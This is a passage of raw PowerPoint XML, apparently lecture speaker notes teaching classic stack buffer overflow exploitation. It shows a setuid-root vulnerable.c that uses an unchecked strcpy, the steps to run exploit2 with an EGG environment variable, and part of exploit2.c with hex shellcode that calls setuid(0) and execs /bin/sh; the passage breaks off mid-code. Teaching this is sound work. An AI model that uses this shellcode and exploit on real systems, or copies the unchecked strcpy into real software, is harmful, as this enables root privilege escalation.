                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> *ret;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    ret = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> *)&amp;ret + 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    (*ret) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)shellcode;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="投影片編號版面配置區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7E98F59A-0B06-4F0E-83E4-728781E360CE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>17</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="備忘稿版面配置區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b="1" u="sng" dirty="0"/>
              <a:t>Commands by root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> -o vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> 755 vulnerable   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> this command line can be optional, depending on the default settings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>: set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> permission, so that the process will take on the privilege of the owner of the program instead of the one who runs it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0"/>
              <a:t> vulnerable is owned by root with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0"/>
              <a:t> permission set, the program has a full root privilege regardless of who runs it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0"/>
              <a:t>To create an environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>TEST=hello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>echo $TEST 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> hello will be printed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./print-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> will be printed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./print-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t> $TEST	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> hello will be printed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    char buffer[512];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> &gt; 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="投影片編號版面配置區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0368DE6-B06D-442D-8536-E119B2DF5085}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>18</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="備忘稿版面配置區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b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In the code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buff  "EGG=&lt;shellcode&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;…&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;\0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(optional) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>echo $EGG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>./exploit2 700</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(optional) echo $EGG  content of $EGG: shellcode + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>./vulnerable $EGG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> only successful (get the root shell) if we are very lucky since it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> is too difficult for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to point to the beginning of the shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit2.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_OFFSET                    0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>#define DEFAULT_BUFFER_SIZE             512</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>char shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x89\xd8\xb0\x17\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x80" /*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(0) (will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" baseline="0" dirty="0"/>
              <a:t> be explained later)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>  "\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>   __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>__("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
